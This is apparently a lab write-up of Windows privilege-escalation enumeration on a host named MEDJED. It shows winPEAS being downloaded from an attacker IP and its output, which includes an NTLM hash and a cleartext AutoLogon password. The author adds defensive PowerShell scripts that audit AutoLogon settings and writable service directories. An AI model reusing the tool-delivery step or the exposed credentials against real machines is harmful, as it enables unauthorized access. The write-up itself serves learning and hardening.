PEAS
Running automated enumeration (winPEAS) after the manual enumeration, delivered from the attacker host over HTTP.
PS C:\tmp> iwr -Uri http://192.168.45.195/winPEASx64.exe -OutFile C:\tmp\winPEASx64.exe
Delivery complete
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: MEDJED
PSExecutionPolicyPreference: Bypass
HOMEPATH: \Users\Jerren
LOCALAPPDATA: C:\Users\Jerren\AppData\Local
PSModulePath: C:\Users\Jerren\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\Yarn\bin\;C:\Program Files (x86)\nodejs\;C:\Ruby26-x64\bin;C:\Users\Jerren\AppData\Local\Microsoft\WindowsApps;C:\Users\Jerren\AppData\Local\Yarn\bin;C:\Users\Jerren\AppData\Roaming\npm;
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
LOGONSERVER: \\MEDJED
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.RB;.RBW;.CPL
HOMEDRIVE: C:
SystemRoot: C:\WINDOWS
RUBYOPT: -Eutf-8
SESSIONNAME: Console
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
USERPROFILE: C:\Users\Jerren
AP_PARENT_PID: 6360
APPDATA: C:\Users\Jerren\AppData\Roaming
PROCESSOR_REVISION: 0101
USERNAME: Jerren
CommonProgramW6432: C:\Program Files\Common Files
OneDrive: C:\Users\Jerren\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: MEDJED
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\WINDOWS\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\Jerren\AppData\Local\Temp
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\Jerren\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\WINDOWS
USERDOMAIN: MEDJED
PUBLIC: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\Yarn\bin\;C:\Program Files (x86)\nodejs\
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
N/A
UAC
PowerShell
C:\Users\Jerren\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
NTLM
Jerren::MEDJED:1122334455667788:12d2388776ee84388d1d4fa83ce40536:0101000000000000fbd7ac131eabdb0181e9e75da82d451700000000080030003000000000000000000000000020000082de34bf2a9e4fb18c2af32412bc58b0d503f4e5a563f15d0345305d8e4445210a00100000000000000000000000000000000000090000000000000000000000
.NET
Token Privileges (jerren)
RDP Session
The jerren user has an RDP session
AutoLogon
Password of the jerren user found: CatastropheToes543
PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
LastLogOffEndTimePerfCounter REG_QWORD 0x2113f6cfbd3
ShutdownFlags REG_DWORD 0x13
Userinit REG_SZ C:\Windows\system32\userinit.exe,
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ CatastropheToes543
DefaultUserName REG_SZ Jerren
DisableCad REG_DWORD 0x1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-242175207-3260895204-4250494957-1003
LastUsedUsername REG_SZ Jerren
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
Confirmed
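The winPEAS AutoLogon hit above was confirmed by hand with `reg query`. As an added audit example (this is not winPEAS code and not part of the original notes), the PowerShell below does the same check in a form suited to a defender or a hardening pass: it reads the Winlogon key, reports whether `AutoAdminLogon` is on and whether `DefaultPassword` is stored as a readable REG_SZ, masks the value rather than echoing it, and can remove the exposure with a `-Remediate` switch. It also implements the "check for passwords or keys in the env variables" hint from the ENV section. Function names, the name pattern and the severity labels are my own choices.

```powershell
# Added audit example (not part of the original notes). Reports the Winlogon
# AutoLogon state and any environment variable whose name looks secret-bearing.
# Secret values are masked so the report itself cannot leak them.

function Get-AutoLogonExposure {
    [CmdletBinding()]
    param(
        # Remove the cleartext DefaultPassword and turn AutoAdminLogon off (needs admin on HKLM).
        [switch]$Remediate
    )

    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $wl  = Get-ItemProperty -Path $key -ErrorAction Stop

    $autoLogon    = ($wl.AutoAdminLogon -eq '1')
    $clearTextPwd = -not [string]::IsNullOrEmpty($wl.DefaultPassword)

    # The Winlogon key is readable by every local account, so a REG_SZ DefaultPassword
    # is exposed to any user; the LSA-secret form written by Sysinternals Autologon is not.
    if ($autoLogon -and $clearTextPwd) {
        $finding = 'HIGH: AutoAdminLogon enabled with cleartext DefaultPassword in the registry'
    } elseif ($autoLogon) {
        $finding = 'MEDIUM: AutoAdminLogon enabled; password presumably held as an LSA secret'
    } else {
        $finding = 'OK: AutoAdminLogon not enabled'
    }

    $masked = if ($clearTextPwd) { '*' * $wl.DefaultPassword.Length } else { $null }

    $report = [pscustomobject]@{
        AutoAdminLogon    = $autoLogon
        DefaultUserName   = $wl.DefaultUserName
        DefaultDomainName = $wl.DefaultDomainName
        ClearTextPassword = $clearTextPwd
        PasswordMasked    = $masked
        Finding           = $finding
        Remediated        = $false
    }

    if ($Remediate -and $clearTextPwd) {
        Remove-ItemProperty -Path $key -Name 'DefaultPassword' -ErrorAction Stop
        Set-ItemProperty    -Path $key -Name 'AutoAdminLogon' -Value '0' -ErrorAction Stop
        $report.Remediated = $true
    }
    return $report
}

function Get-SecretLikeEnvironmentVariables {
    # Name fragments that commonly carry credentials; extend to taste.
    $pattern = 'pass|pwd|secret|token|api_?key|credential'
    foreach ($scope in 'Process', 'User', 'Machine') {
        $vars = [System.Environment]::GetEnvironmentVariables($scope)
        foreach ($name in $vars.Keys) {
            if ($name -notmatch $pattern) { continue }
            $value = [string]$vars[$name]
            [pscustomobject]@{
                Scope       = $scope
                Name        = $name
                ValueMasked = ('*' * [Math]::Min(8, $value.Length)) + "... ($($value.Length) chars)"
            }
        }
    }
}

Get-AutoLogonExposure | Format-List
Get-SecretLikeEnvironmentVariables | Format-Table -AutoSize
```

Run as a standard user the report still works, because the Winlogon key is world-readable; that is precisely why a REG_SZ `DefaultPassword` is a finding. `-Remediate` needs an elevated shell, and after removing the value the box will prompt at logon unless the password is re-entered with a tool that stores it as an LSA secret.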
Services
Interesting Services
Write access to the C:\bd directory
Modifiable Services
RmSvc: GenericExecute (Start/Stop)
wcncsvc: GenericExecute (Start/Stop)
BcastDVRUserService_4bbfd: GenericExecute (Start/Stop)
ConsentUxUserSvc_4bbfd: GenericExecute (Start/Stop)
CredentialEnrollmentManagerUserSvc_4bbfd: GenericExecute (Start/Stop)
DeviceAssociationBrokerSvc_4bbfd: GenericExecute (Start/Stop)
DevicePickerUserSvc_4bbfd: GenericExecute (Start/Stop)
DevicesFlowUserSvc_4bbfd: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_4bbfd: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_4bbfd: GenericExecute (Start/Stop)
UdkUserSvc_4bbfd: GenericExecute (Start/Stop)
UnistoreSvc_4bbfd: GenericExecute (Start/Stop)
UserDataSvc_4bbfd: GenericExecute (Start/Stop)
WpnUserService_4bbfd: GenericExecute (Start/Stop)
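Two different things are listed under Services. The `_4bbfd`-suffixed entries are per-user service instances, and the owning user normally holds Start/Stop over its own instances, so that list is mostly expected behaviour. The write access to `C:\bd` under "Interesting Services" is the finding worth chasing, since a service binary in a user-writable directory lets a low-privileged user replace what the service runs. As an added example (my own code, not winPEAS and not from the original notes), the PowerShell below audits every service for that condition: it parses each service's `PathName`, takes the binary's directory, and checks the directory ACL against the SIDs in the current token, honouring Deny entries before Allow. Function names and the rights mask are my choices.

```powershell
# Added audit example (not part of the original notes): list services whose
# executable lives in a directory the current user can write to.

function Test-DirectoryWritable {
    param(
        [string]$Path,
        [System.Security.Principal.SecurityIdentifier[]]$Sids,
        [System.Security.AccessControl.FileSystemRights]$Mask
    )
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }

    # Resolve each ACE to a SID and keep only those that apply to this token.
    $relevant = foreach ($ace in $acl.Access) {
        if (($ace.FileSystemRights -band $Mask) -eq 0) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
        catch { continue }
        if ($Sids -contains $sid) { $ace }
    }
    # Deny ACEs win over Allow ACEs, as in the real access check.
    if ($relevant | Where-Object AccessControlType -eq 'Deny')  { return $false }
    if ($relevant | Where-Object AccessControlType -eq 'Allow') { return $true }
    return $false
}

function Get-ServicesInWritableDirectories {
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids   = @($identity.User) + @($identity.Groups)      # every SID the token carries
    # Rights that let a user swap or remove the binary.
    $write    = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete'
    $verdicts = @{}                                           # directory -> writable?

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if ([string]::IsNullOrWhiteSpace($svc.PathName)) { continue }
        # A quoted path, otherwise the first whitespace-free token (arguments dropped).
        if ($svc.PathName -match '^\s*"([^"]+)"') { $exe = $Matches[1] }
        else { $exe = ($svc.PathName.Trim() -split '\s+')[0] }
        $dir = Split-Path -Path $exe -Parent
        if (-not $dir) { continue }

        if (-not $verdicts.ContainsKey($dir)) {
            $verdicts[$dir] = Test-DirectoryWritable -Path $dir -Sids $mySids -Mask $write
        }
        if ($verdicts[$dir]) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                Directory = $dir
                Binary    = $exe
            }
        }
    }
}

Get-ServicesInWritableDirectories | Format-Table -AutoSize
```

Anything this returns running as LocalSystem with a non-disabled start mode is the case to fix first; the remediation is to tighten the directory ACL (for example with `icacls` removing the write grant for Users) or move the binary under `C:\Program Files`, which inherits a sane ACL. Unquoted paths with spaces are not handled here beyond taking the first token, which is a separate class of finding.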